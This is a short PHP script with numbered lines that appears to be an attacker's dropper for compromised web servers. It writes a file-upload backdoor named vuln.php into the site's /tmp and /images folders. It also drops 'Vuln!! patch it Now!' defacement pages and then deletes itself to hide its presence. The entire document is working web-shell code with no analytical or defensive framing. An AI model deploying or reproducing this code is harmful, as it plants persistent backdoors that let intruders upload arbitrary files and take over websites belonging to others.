upl2

1. <title>Vuln!! patch it Now!</title>
2. <?php
3. function http_get($url){
4. $im = curl_init($url);
5. curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
6. curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
7. curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
8. curl_setopt($im, CURLOPT_HEADER, 0);
9. return curl_exec($im);
10. curl_close($im);
11. }
12. $s = '<title>Vuln!! patch it Now!</title><?php echo \'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">\';echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\';if( $_POST["_upl"] == "Upload" ) {if(@copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"])) { echo "<b>Shell Uploaded ! :)<b><br><br>"; }else { echo "<b>Not uploaded ! </b><br><br>"; }}?>';
13. $check = $_SERVER['DOCUMENT_ROOT'] . "/tmp/vuln.php" ;
14. $text = $s;
15. $open = fopen($check, 'w');
16. fwrite($open, $text);
17. fclose($open);
18. if(file_exists($check)){
19. echo $check."</br>";
20. }else
21. echo "not exits";
22. echo "done .\n " ;
23. $check2 = $_SERVER['DOCUMENT_ROOT'] . "/images/vuln.php" ;
24. $text2 = $s;
25. $open2 = fopen($check2, 'w');
26. fwrite($open2, $text2);
27. fclose($open2);
28. if(file_exists($check2)){
29. echo $check2."</br>";
30. }else
31. echo "not exits2";
32. echo "done2 .\n " ;
33.  
34. $check3=$_SERVER['DOCUMENT_ROOT'] . "/vuln.htm" ;
35. $text3 = 'Vuln!! patch it Now!';
36. $op3=fopen($check3, 'w');
37. fwrite($op3,$text3);
38. fclose($op3);
39.  
40.  
41. $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/vuln.htm" ;
42. $text6 = 'Vuln!! patch it Now!';
43. $op6=fopen($check6, 'w');
44. fwrite($op6,$text6);
45. fclose($op6);
46. @unlink(__FILE__);
47. ?>